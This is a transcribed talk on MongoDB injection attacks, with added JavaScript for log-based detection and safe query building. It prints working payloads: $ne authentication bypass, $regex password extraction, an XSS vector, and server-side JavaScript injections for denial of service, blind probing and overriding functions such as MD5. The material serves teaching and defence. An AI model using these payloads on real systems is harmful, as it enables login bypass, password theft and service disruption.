NoSQL: NoInjections or NoSecurity
- Opal Stephens
- 6 years ago
1. NoSQL: NoInjections or NoSecurity
   A Guide to MongoDB Exploitation
   Stark Riedesel, Oct 2016
2. What is a Document Database (NoSQL)?
   Documents = JSON
   Schema-free
   Nested documents (no JOINs)
   BSON for efficiency
   Complex query language:
     Create/Read/Update/Delete (CRUD)
     Data aggregation (sum/average/group by/etc.)
     Full text search
     Map/Reduce (BigData)
     JavaScript query environment: database code execution :)
3. Why? (Most) popular NoSQL database
   Open source (as of 2009)
   Easy to get started: no tables or columns, no data types, just plain JSON objects
   MEAN stack
   Easy to set up and use (not always a good thing)
4. The MEAN Stack
   MongoDB: database / JSON store
   Express.JS: web server
   Angular.JS: client-side app code
   Node.JS: server-side app code
   Full-stack JavaScript: JavaScript everywhere, JSON everywhere, minimal data conversions
   Often: API-based apps
5-7. Out of the Box Insecurity
   By default:
     No authentication
     No access control
     No encryption (at rest or in transit)
   Never, ever, expose it to the internet
8-10. MongoDB Injection Attacks
   Network attacks are obvious
   But can we leverage SQL injection?
   Mongo says no... but
11-12. Query Selectors
   Just JSON!
   A typical query might look like:
     Product.find({ id: req.query.product_id })
   A more complex query might look like:
     Product.find({ price: { $lt: req.query.price } })
   Operators include: $lt $gt $eq $ne $regex (and many more)
13-14. Query Selector Injection
   Query to inject:
     User.find({ username: req.query.username, password: req.query.password })
   Injection:
     username=admin&password[$ne]=
   Resulting query:
     User.find({ username: "admin", password: { $ne: "" } })
15. Demo Time (v1): Demonstration of Query Injections
16. Password Extraction
   By using the $regex operator, we can extract passwords one character at a time:
     password[$regex]=^a      401 Unauthorized
     password[$regex]=^b      401 Unauthorized
     password[$regex]=^c      401 Unauthorized
     password[$regex]=^d      401 Unauthorized
     password[$regex]=^e      401 Unauthorized
     password[$regex]=^f      200 OK
     password[$regex]=^fa     401 Unauthorized
     password[$regex]=^fb     401 Unauthorized
     password[$regex]=^fc     401 Unauthorized
     password[$regex]=^fo     200 OK
     password[$regex]=^foo$   200 OK
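The extraction above leaves a distinctive trail in web-server logs: one client sending the same endpoint a run of `field[$regex]=^prefix` probes. The following is an added detection example, not code from the slides; it parses constructed access-log lines of the shape "client method path status", flags any query-string key that carries a `$`-operator, and reports clients that sent at least three `$regex` probes against one field. The log shape, the threshold and the placeholder base URL are assumptions made for the example.

```javascript
// Added example, not from the slides: scan web-server access logs for MongoDB
// query-selector operators arriving in query-string keys (field[$op]=...) and
// group repeated $regex probes per client and field, which is the shape of the
// character-by-character password extraction shown above.

// Constructed sample lines in a "client method path status" shape.
const SAMPLE_LOG = [
  '10.0.0.5 GET /login?username=admin&password=secret 401',
  '10.0.0.9 GET /login?username=admin&password[$ne]= 200',
  '10.0.0.7 GET /login?username=admin&password[$regex]=^a 401',
  '10.0.0.7 GET /login?username=admin&password[$regex]=^f 200',
  '10.0.0.7 GET /login?username=admin&password[$regex]=^fo 200',
  '10.0.0.7 GET /login?username=admin&password[$regex]=^foo$ 200',
  '10.0.0.3 GET /products?price[$lt]=100 200',
  'garbage line that does not parse',
];

// A query-string key of the form field[$op]; captures the field and the operator.
const OPERATOR_KEY = /^([^[\]]+)\[(\$[A-Za-z]+)\]$/;

// Parse one line; returns null for lines that do not match the expected shape.
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (\S+) (\d{3})$/);
  if (!m) return null;
  // The base URL is only needed to parse a relative path; it is a placeholder.
  const url = new URL(m[3], 'http://placeholder.invalid');
  return { client: m[1], method: m[2], path: url.pathname, params: url.searchParams, status: Number(m[4]) };
}

// All operator-bearing parameters of one request: [{ field, op, value }].
function findOperators(params) {
  const hits = [];
  for (const [key, value] of params) {
    const m = key.match(OPERATOR_KEY);
    if (m) hits.push({ field: m[1], op: m[2], value });
  }
  return hits;
}

// Scan the log. Returns one finding per request carrying an operator, plus the
// clients that sent at least `threshold` $regex probes against the same field.
function scanLog(lines, threshold = 3) {
  const findings = [];
  const regexProbes = new Map(); // "client field" -> count of $regex probes
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const ops = findOperators(req.params);
    if (ops.length === 0) continue;
    findings.push({ client: req.client, path: req.path, status: req.status, ops });
    for (const { field, op } of ops) {
      if (op !== '$regex') continue;
      const key = `${req.client} ${field}`;
      regexProbes.set(key, (regexProbes.get(key) || 0) + 1);
    }
  }
  const extractionSuspects = [...regexProbes.entries()]
    .filter(([, count]) => count >= threshold)
    .map(([key, count]) => {
      const [client, field] = key.split(' ');
      return { client, field, probes: count };
    });
  return { findings, extractionSuspects };
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Any single `field[$op]` key is worth an alert on its own, because a legitimate front end built with the framework's own query helpers does not emit bracketed operator keys; the per-client `$regex` count is there to separate a one-off probe from an extraction in progress.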
17. Bonus: XSS Vector
   Displaying MongoDB error messages is BAD
     User.findOne({ username: req.query.username, password: req.query.password }, function(error, user) {
       if (error) return res.send(error);
       else return res.send("Logged in as: " + user.username);
     });
18. Bonus: XSS Vector
   Injection:
     password[$<script>alert('XSS');</script>]=
19. Demo Time (v2): Advanced Query Injections
20. Only You Can Prevent Query Selector Injections
   Validate/sanitize your inputs. I know you know, but do your developers know?
   "But I thought ORMs prevent injections"
     MEAN is young; (almost) no libraries do this by default
     User.findOne({ username: String(req.query.username), password: String(req.query.password) });
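To make the difference concrete, here is an added example (not code from the slides) that builds the login selector three ways: the naive pass-through, the `String()` coercion from the slide, and a stricter version that refuses anything but plain strings. `INJECTED_QUERY` is a constructed stand-in for what Express's default query parser produces from `username=admin&password[$ne]=`, `USERS` is a constructed stand-in for the users collection, and `matches()` is a minimal stand-in for the server's matching (equality and `$ne` only) so the result of each selector can be seen offline.

```javascript
// Added example, not from the slides: the login selector built three ways.
// Express's default query parser turns "username=admin&password[$ne]=" into the
// nested object INJECTED_QUERY; the literals below are constructed stand-ins
// for req.query, and USERS is a constructed stand-in for the users collection.
const INJECTED_QUERY = { username: 'admin', password: { $ne: '' } };
const NORMAL_QUERY = { username: 'alice', password: 'hunter2' };
const USERS = [
  { username: 'admin', password: 'correct horse battery' },
  { username: 'alice', password: 'hunter2' },
];

// True if any key at any depth starts with '$', i.e. the value carries a
// query operator. Works for JSON bodies too, where nesting is arbitrary.
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === 'object') {
    return Object.keys(value).some((k) => k.startsWith('$') || containsOperator(value[k]));
  }
  return false;
}

// Naive: whatever type the parser produced goes straight into the selector.
function naiveLoginFilter(query) {
  return { username: query.username, password: query.password };
}

// The slide's fix: String() coercion. An injected object becomes the literal
// "[object Object]", which matches no real password, but the request is not refused.
function coercedLoginFilter(query) {
  return { username: String(query.username), password: String(query.password) };
}

// Stricter: require plain strings and refuse anything else, so the attempt is
// visible to the application (log it, rate-limit it) instead of silently failing.
function strictLoginFilter(query) {
  const { username, password } = query;
  if (typeof username !== 'string' || typeof password !== 'string' || containsOperator(query)) {
    throw new TypeError('username and password must be plain strings');
  }
  return { username, password };
}

// Minimal stand-in for the server-side match (equality and $ne only), enough to
// show what each selector returns without a database.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === 'object' && '$ne' in cond) return doc[field] !== cond.$ne;
    return doc[field] === cond;
  });
}

// Usernames the selector would log in as.
function loginAs(filter) {
  return USERS.filter((u) => matches(u, filter)).map((u) => u.username);
}

console.log('naive, injected  :', loginAs(naiveLoginFilter(INJECTED_QUERY)));   // [ 'admin' ]
console.log('coerced, injected:', loginAs(coercedLoginFilter(INJECTED_QUERY))); // []
console.log('naive, normal    :', loginAs(naiveLoginFilter(NORMAL_QUERY)));     // [ 'alice' ]
try {
  strictLoginFilter(INJECTED_QUERY);
} catch (e) {
  console.log('strict, injected : refused:', e.message);
}
```

Coercion is the smallest change and is what the slide shows; the strict variant is preferable where you also want the attempt to surface, because a refused request can be logged and rate-limited while a silently failed login looks like a typo.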
21. Advanced MongoDB Exploitation: Time for some good old JavaScript RCE
22. Server Side JavaScript (SSJS) Execution
   Executed in the context of the Mongo server
   Operator: $where
     Customer.find({ $where: "this.credits == this.debits" })
     User.find({ $where: "this.password == MD5('" + req.query.password + "')" })
   Aggregations
     Group (aka GROUP BY): used to create custom aggregations
     Map/Reduce (aka BigData): used to perform complex logic server-side
23. SSJS Injection
   User-supplied data -> JavaScript function -> RCE
   Same issue as traditional SQL injection:
     User.find({ $where: "this.password == MD5('" + req.query.password + "')" })
   Arbitrary JS code, but sandboxed (versions > 2.4):
     Cannot write/modify data
     Cannot access the global db object
     Cannot access other collections
24. Anatomy of an SSJS Injection
   ';return 1==1;}//                              - roughly equivalent to SQLi: ' OR 1=1
   ';return this.username=="admin";}//
   ';while(1);return 1==1;}//
   ';sleep(1000);return 1==1;}//
   ';assert(false,tojson(this));return 1==1;}//
25. The Global Namespace
   Documentation: 31 functions vs. reality: ~100 functions/properties
   Interesting: able to read recent JavaScript clauses via the _funcs# properties
   Scary: able to modify JS built-in functions
     var global = Function('return this')();
     printjson(Object.getOwnPropertyNames(global));
26. SSJS Injection Attack Patterns
   Error injection (dump objects):  assert(false, tojson(this))
   Error injection (XSS):           assert(false, "<script>alert('xss');</script>")
   DoS:                             while(1);
   Blind injections:                if(str[0]=='a'){sleep(100);}
27. Advanced SSJS Injection Attack Patterns
   Taint the global namespace:
     var global = Function('return this')();
     global.Date = function(){ assert(false, tojson(eval(obj))); };
     return 1==1;}//
   Disrupt security functionality:
     var global = Function('return this')();
     global.MD5 = function(x){ return x; };
     return 1==1;}//
   Dump recent code execution:
     var global = Function('return this')();
     assert(false, tojson(global._funcs1));
     return 1==1;}//
28. Demo Time (v3): This time with more code execution!
29-30. Preventing SSJS Injection
   Disable scripting entirely: --noscripting
   Just don't have user input in JS code
   Validate, validate, validate
   Scoped variables? Yes, but no major ORM supports this yet:
     var bson = require('bson');
     var ssjs = new bson.Code("(this.credits - this.debits) > amount", { amount: req.query.amount });
     mycollection.find({ $where: ssjs });
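The scoped-variable form above keeps the amount out of the JavaScript source, but it still runs server-side JavaScript, which `--noscripting` forbids. The following added example (not code from the slides or the bson package) takes the "just don't have user input in JS code" advice literally: the same balance test is built once by string concatenation into `$where`, and once with the query operators `$expr`, `$subtract` and `$gt` (available from MongoDB 3.6) after the amount has been validated as a decimal literal. `evalExpr()` and `SAMPLE_DOCS` are constructed stand-ins for the server and the collection so the example runs offline; the `$where` string is only displayed, never executed.

```javascript
// Added example, not from the slides: the condition from the slide,
// "(this.credits - this.debits) > amount", built two ways. buildWhereFilter()
// is the string-concatenation pattern the slide warns about. buildExprFilter()
// expresses the same test with MongoDB's $expr/$subtract/$gt query operators
// (server 3.6 and later) after validating the amount as a number, so user data
// never reaches a JavaScript evaluator. evalExpr() and SAMPLE_DOCS are
// constructed stand-ins for the server and the collection.

// Vulnerable: the raw parameter is spliced into server-side JavaScript.
function buildWhereFilter(rawAmount) {
  return { $where: '(this.credits - this.debits) > ' + rawAmount };
}

// Accept only a decimal literal; anything else (including JavaScript) is refused.
function parseAmount(rawAmount) {
  if (typeof rawAmount !== 'string' || !/^-?\d+(\.\d+)?$/.test(rawAmount)) {
    throw new TypeError('amount must be a decimal number');
  }
  return Number(rawAmount);
}

// Safe: operators only; the amount is a number by the time it enters the filter.
function buildExprFilter(rawAmount) {
  const amount = parseAmount(rawAmount);
  return { $expr: { $gt: [{ $subtract: ['$credits', '$debits'] }, amount] } };
}

// Evaluates the $expr shape above against one document ("$field" references,
// numbers, $subtract, $gt); a stand-in for the server so the example runs offline.
function evalExpr(doc, expr) {
  if (typeof expr === 'number') return expr;
  if (typeof expr === 'string' && expr.startsWith('$')) return doc[expr.slice(1)];
  if (expr && Array.isArray(expr.$subtract)) {
    const [a, b] = expr.$subtract.map((e) => evalExpr(doc, e));
    return a - b;
  }
  if (expr && Array.isArray(expr.$gt)) {
    const [a, b] = expr.$gt.map((e) => evalExpr(doc, e));
    return a > b;
  }
  throw new Error('unsupported expression');
}

// Constructed sample collection.
const SAMPLE_DOCS = [
  { name: 'acme', credits: 50, debits: 20 }, // balance 30
  { name: 'zeta', credits: 10, debits: 25 }, // balance -15
];

// Names of documents whose balance exceeds the requested amount.
function findAbove(rawAmount) {
  const filter = buildExprFilter(rawAmount);
  return SAMPLE_DOCS.filter((d) => evalExpr(d, filter.$expr)).map((d) => d.name);
}

console.log(findAbove('15'));  // [ 'acme' ]
console.log(findAbove('-20')); // [ 'acme', 'zeta' ]
// The slide's payload lands verbatim in the $where string (shown, not run)...
console.log(buildWhereFilter(';return 1==1;}//').$where);
// ...but is refused before it can become part of an operator filter.
try {
  findAbove(';return 1==1;}//');
} catch (e) {
  console.log('refused:', e.message);
}
```

Rewriting `$where` conditions as operator expressions is usually possible for arithmetic and comparison logic, and once no `$where`, `mapReduce` or `$function` use remains in the application, starting the server with `--noscripting` removes the SSJS attack surface entirely rather than relying on every call site being careful.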
31-32. State of MongoDB
   Most deployments don't do network stuff right
   Apps/libraries haven't learned the lessons from SQL injection
   Web frameworks assist us in building query objects
   JavaScript injection is scary
   Security testing tools:
     Burp Suite: good SSJS detection
     NoSQLMap: outdated/limited for SSJS; good for network stuff
     Pretty much nothing scans for query selector injection